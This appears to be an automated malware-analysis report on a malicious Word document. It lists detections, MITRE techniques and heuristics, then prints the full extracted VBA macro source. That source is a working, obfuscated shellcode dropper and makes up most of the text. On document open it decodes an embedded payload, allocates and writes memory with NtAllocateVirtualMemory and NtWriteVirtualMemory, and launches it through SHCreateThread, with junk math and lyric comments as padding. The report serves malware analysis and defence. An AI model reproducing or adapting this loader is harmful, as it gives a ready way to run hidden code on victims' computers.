MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing VBA macros, as indicated by the critical ClamAV detection and heuristic firings. The 'Document_Open' macro and the 'SE_ENABLE_LURE' heuristic suggest the document attempts to trick the user into enabling macros to execute malicious code. The VBA script appears to be obfuscated, making it difficult to determine the exact payload, but its presence strongly indicates a dropper functionality.
Heuristics 5
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Dim marbled As Long -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13782 bytes |
SHA-256: d8f37d0c27e71bbc1cbb67fcb61526d1169e2a4b353baeb050cf54716ecae625 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim marbled As Long
Dim philosophy As Variant
ceruse = "movableness"
predestine
neutrino = 46
uncleanly = 16906
alundum = 229440
blearedness = SLN(alundum, uncleanly, neutrino)
End Sub
Sub predestine()
Dim epizoic As Variant
Dim endoscopy As String
lowrise = ThisDocument.ComputeStatistics(wdStatisticPages)
mooncalf.review.Value = lowrise + 9
localized = "inconceivableness"
diestrus = "things"
baldness = "de" & "meri" & "t"
Set putdown = mooncalf.review.SelectedItem
vehement = 15
jacksonian = 33516
heavensent = 411417
manis = SLN(heavensent, jacksonian, vehement)
khamti = putdown.Name
capillata = 118 + 50 + 7292
landwehr = Right(khamti, capillata)
colleen = selfaddressed.nonsuccess(landwehr)
casing = 7
come = 9798
augusta = 239618
come = Pmt(0.071, casing, -2400, augusta, 1)
alleviation = "embarrass"
amsonia = "dem" & "onetization"
#If Win64 Then
Dim maturational As Long
Dim condense As LongPtr
Dim ean As LongPtr
Dim workweek As Integer
#Else
Dim hooflike As Byte
Dim ean As Long
Dim huff As Variant
Dim condense As Long
#End If
chalice = 0
impudence = "mesoderm"
grapnel = 4096
aboideau = 29
america = 27171
adamantine = 169122
america = Pmt(0.0765, aboideau, -24239, adamantine, 1)
trichotomy = "acknowledgeable"
jeroboam = "easternmost"
awayness = "symptom"
cryptoprocta = 32
woodworm = 37179
pinned = 158715
loire = SLN(pinned, woodworm, cryptoprocta)
precautions = colleen
somali = "servans"
unquestioning = "aoritis"
condense = tytonidae(precautions)
tracasserie = "propriety"
bushtit = "judiciary"
#If Win64 Then
Dim indecisively As Integer
Dim monsoon As LongPtr
Duplicate = "faultfinding"
embezzle = "spleenish"
effigies = "disdainfully"
Dim furfur As LongPtr
flailing = 33 - 33 + 1280
#ElseIf Win32 Then
melodically = "menispermaceae"
phonics = "delawarean"
selfdenial = "niceness"
Dim monsoon As Long
arrest = 36 + 478
Dim furfur As Long
flailing = arrest + 3204
#End If
Dim auricularia As Long
Dim bouleverser As String
monsoon = 104 + 23 - 127
ean = condense + flailing
furfur = 1
trisulcate = unapprized(ean, monsoon, furfur, monsoon)
nnumber = 42
biretta = 21067
applejack = 321359
equate = SLN(applejack, biretta, nnumber)
End Sub
Function tytonidae(mender)
Dim aeciospore As Long
Dim spinelessness As Integer
Dim cubic As String
Dim nacimiento As Variant
#If Win64 Then
Dim cakile As Byte
Dim claustrophobic As LongPtr
unclutch = 8
Dim dodo As String
Dim debriefing As LongPtr
Dim missay As Integer
Dim atonality As LongPtr
Dim pants As Integer
#Else
Dim choregus As Long
Dim claustrophobic As Long
unclutch = 4
Dim debriefing As Long
Dim milkman As String
Dim atonality As Long
Dim toxicodendron As String
Dim exemplary As Long
#End If
caryatid = catsear(VarPtr(claustrophobic), VarPtr(mender) + 8, unclutch)
operate = -1
debriefing = 0
feminate = 0
atonality = 29 - 59 + 31 + 9587
hepaticopsida = 34 + 75 + 88 + 3899
equipollent = 40 + 24
depose = discoglossidae(ByVal operate, debriefing, ByVal feminate, atonality, ByVal hepaticopsida, ByVal equipollent)
affably = ammodytes / 287
affably = affably - 358
catsear debriefing, claustrophobic, 60 + 5534
catenation = 43
capriole = 29517
nuances = 302286
autologous = SLN(nuances, capriole, catenation)
tytonidae = debriefing
End Function
Sub upper()
Dim InitialCaps As Range
Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
End:=ActiveDocument.Words(3).End)
InitialCaps.Case = wdUpperCase
End Sub
Function catsear(quidem, apopemptic, bonnily)
#If Win64 Then
Dim pyocyanase As Variant
Dim chancellorsville As String
Dim algorism As LongPtr
Dim sediment As LongPtr
Dim belemnitidae As LongPtr
Dim chasser As String
Dim thuggery As LongPtr
Dim detachment As LongPtr
#Else
Dim sediment As Long
Dim primitively As Integer
Dim algorism As Long
Dim ballot As Integer
Dim thuggery As Long
Dim amrinone As Byte
Dim belemnitidae As Long
Dim pathway As Variant
Dim detachment As Long
Dim almanac As Variant
Dim abient As Integer
#End If
checkpoint = matutinal
affably = Fix(117.376 + 114.2197)
sediment = quidem
detachment = bonnily
ail = ail
thuggery = apopemptic
huffing = 16
crisis = 28804
nasally = 141610
coagency = SLN(nasally, crisis, huffing)
matutinal = catchpenny
algorism = 96 + 109 + 87 - 293
carnally ByVal algorism, sediment, thuggery, detachment, belemnitidae
affably = ammodytes And 451
End Function
Attribute VB_Name = "selfaddressed"
' And when I doubt
' You remind me of just how lucky I am
' Because it's the hardest thing I've ever done
#If Win64 Then
' You remind me of just how lucky I am
' You always seem
' Because it's the hardest thing I've ever done
Public Declare PtrSafe Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal saxony As LongPtr, ByVal abuna As Any, ByVal sarawakian As LongPtr, ByVal salmo As LongPtr) As LongPtr
' You surprise me with
' п»їSometimes I doubt the path I chose
' And my bad examples
Public Declare PtrSafe Function appreciably Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal heraldry As LongPtr,algometry As LongPtr,blowfly As LongPtr,bruin As LongPtr,conclusive As LongPtr) As Boolean
' You're my belief
' Sometimes my dreams feel all on hold
' There's no doubt that this will make me strong
Public Declare PtrSafe Function ascription Lib "Shell32.dll" Alias "SHGetDesktopFolder" (myoma As LongPtr)
' If you are dreaming
' Just how perfect you are
' Just how perfect you are
Public Declare PtrSafe Function distended Lib "Kernel32.dll" Alias "LocalFree" (literati As LongPtr) As LongPtr
' Just how perfect you are
' The stronger one
' Because it's the hardest thing I've ever done
Public Declare PtrSafe Function discoglossidae Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (cristobalite As LongPtr, dummy As LongPtr, ByVal welloff As LongPtr,pharisaismByVal As LongPtr, accipiter As LongPtr, ByVal ar As LongPtr) As LongPtr
' If you are dreaming
' You surprise me with just how perfect you are
' You remind me of just how perfect you are
Public Declare PtrSafe Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal chippendale As Any, ByVal chudder As Any, ByVal elbows As Any, ByVal churchdoor As Any, ByVal pyrrhus As Any) As LongPtr
' You remind me of just how lucky I am
' Even with all my flaws
' You surprise me with just how perfect you are
Public Declare PtrSafe Function already Lib "Shell32.dll" Alias "SHGetSettings" (freshet As LongPtr,caruncle As LongPtr) As LongPtr
' I never want to wake you up
' Out in the world that's beyond my control
' When I'm at my wit's end
Public Declare PtrSafe Function atlantes Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (vat As LongPtr, abutter As Any,haystack As LongPtr, fit As Any) As Boolean
' Because it's the hardest thing I've ever done
' I'm suppose to be
' I never want to wake you up
' I never want to wake you up
'
' You search for me
#Else
' The stronger one
' And when I'm lost
' I'm suppose to be
Public Declare Function solanum Lib "Kernel32.dll" Alias "LocalFree" (spartan As Long) As Long
' You're my belief
' You always seem
' Still, I hold my breath each time you go
Public Declare Function bargainpriced Lib "Shell32.dll" Alias "SHGetSettings" (geared As Long, followon As Long) As Long
' Just how perfect you are
'
' And my bad examples
Public Declare Function toastmaster Lib "Shell32.dll" Alias "SHGetDesktopFolder" (aedes As Long)
' Sometimes my dreams feel all on hold
' Because it's the hardest thing I've ever done
' And I'm losing my head
Public Declare Function latimeridae Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gorgonocephalus As Long, gradeconstructed As Any, beelzebub As Long, lhonneur As Any) As Boolean
' Because it's the hardest thing I've ever done
' You're my belief
' Sometimes my dreams feel all on hold
Public Declare Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal affirm As Long, ByVal panonychus As Any, ByVal losing As Any, ByVal harmonically As Any) As Long
' You surprise me with just how perfect you are
' Because it's the hardest thing I've ever done
' You're my belief
Public Declare Function chimakum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conversation As Long, hello As Long, reovirus As Long, skater As Long, givenness As Long) As Boolean
' And I'm losing my head
' And when I'm lost
' You remind me of just how lucky I am
Public Declare Function discoglossidae Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (flexible As Long, endodontist As Long, ByVal allocution As Long, bissextileByVal As Long, dragonnade As Long, ByVal gangrenous As Long) As Long
' You surprise me with
' You remind me of just how perfect you are
' You surprise me with just how perfect you are
Public Declare Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal accueil As Any, ByVal collapsible As Any, ByVal romanian As Any, ByVal hejira As Any, ByVal sorceress As Any) As Long
' Still, I hold my breath each time you go
' Just how perfect you are
' To prove that theory wrong
' I'm suppose to be
' And when I doubt
' The stronger one
#End If
' You surprise me with
' Still, I hold my breath each time you go
' And my bad examples
Function bifilar(emperor)
bifilar = AscW(emperor)
End Function
Function nonsuccess(caboose) As String
Dim coltsfoot As Variant
checkpoint = ail
Dim remonetize As Integer
Dim sembarquer(63) As Long
Dim cuban As Long
Dim blackberry As String
Dim indisputable(63) As Long
Dim gracilariid As Long
Dim deuterogamy As Variant
Dim kudzu(6965) As Byte
Dim ichneumon(63) As Long
Dim sidewheeler As Long
Dim rower As Long
affably = Rnd(363.395 + 288.6023)
Dim regiment As Variant
Dim bootlace() As Byte
catchpenny = "gouache"
dithering = 16 + 104 - 86 + 16515038
Dim aztreonam As Long
allhallows = 255
proctor = 64
caredfor = 33 + 5 + 65242
testaceology = 262144
Dim albification As Variant
Dim gainful As Variant
hesitancy = 258048
nervousness = 4032
luger = 63
slog = 79 + 4017
ambergris = 62 + 59 + 77 + 16711482
gvisum = 126 + 117 + 13
cymbid = 65536
Dim affluence As Long
palace = 53 - 53
armorclad = 51 - 53 + 7461
Dim gilbert() As Byte
gilbert = VBA.StrConv(caboose, vbFromUnicode)
Dim markbelow As String
fierily = 16
oiling = 12156
outspeak = 374597
oiling = Pmt(0.068, fierily, -22301, outspeak, 0)
fain = 7459
lanthanum = 35
authenticate = Log(100) / Log(10) + 14
For affirmance = 0 To fain
If affirmance Mod 2 = 0 Then
gilbert(affirmance) = gilbert(affirmance) + authenticate
Else
gilbert(affirmance) = gilbert(affirmance) + authenticate - 1
End If
Next affirmance
steprelationship = 37
platyrrhini = 13272
ingenuousness = 253747
cheekbone = SLN(ingenuousness, platyrrhini, steprelationship)
remonetize = 0
schemist = 0
filigree = 43
pipelaying = immunity
For gracilariid = 0 To 63
indisputable(gracilariid) = choriotis(gracilariid, proctor, 3)
sembarquer(gracilariid) = choriotis(gracilariid, slog, 3)
ichneumon(gracilariid) = choriotis(gracilariid, testaceology, 3)
Next gracilariid
chrome = 99
moo = 18434
braise = 504435
moo = Pmt(0.066, chrome, -36184, braise, 0)
bootlace = gilbert
childcare = 37 + 77 + 42 - 152
chionanthus = 39
photomechanical = 21321
loyalty = 164804
prepared = SLN(loyalty, photomechanical, chionanthus)
basilica = 3
checkpoint = checkpoint
ammodytes = VBA.Math.Round(198.4053 + 497.5379)
aggressiveness = basilica + 1
airy = 2
For rower = 0 To fain
cretin = bootlace(rower)
deceleration = bootlace(rower + 2)
sidewheeler = ichneumon(pipelaying(cretin)) _
+ sembarquer(pipelaying(bootlace(rower + 1))) + indisputable(pipelaying(deceleration)) + pipelaying(bootlace(rower + basilica))
gracilariid = choriotis(sidewheeler, ambergris, 2)
kudzu(cuban) = choriotis(gracilariid, cymbid, 1)
gracilariid = choriotis(sidewheeler, caredfor, 2)
kudzu(cuban + 1) = choriotis(gracilariid, gvisum, 1)
kudzu(cuban + airy) = choriotis(sidewheeler, allhallows, 2)
cuban = cuban + airy + 1
rower = rower + 3
Next
nonsuccess = kudzu
End Function
Function immunity()
Dim dicta(255) As Byte
nephew = 65
Do
dicta(nephew) = nephew - 65
nephew = nephew + 1
Loop Until nephew = 91
nephew = 48
Do
dicta(nephew) = nephew + 4
nephew = nephew + 1
Loop Until nephew = 58
nephew = 97
Do
dicta(nephew) = nephew - 71
nephew = nephew + 1
Loop Until nephew = 123
dicta(47) = 63
nephew = 43
dicta(nephew) = 62
immunity = dicta
End Function
Function choriotis(anxiousness, tuille, capillarity)
Select Case capillarity
Case 1
choriotis = anxiousness \ tuille
Case 2
choriotis = anxiousness And tuille
Case 3
choriotis = anxiousness * tuille
End Select
End Function
Sub add()
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers
.IncludeChapterNumber = True
.ChapterPageSeparator = wdSeparatorEnDash
End With
End Sub
Attribute VB_Name = "mooncalf"
Attribute VB_Base = "0{957FDB00-5366-4A10-B75E-6F214022514C}{C30BDC94-A2FA-4B6F-926E-B993C2F5607B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.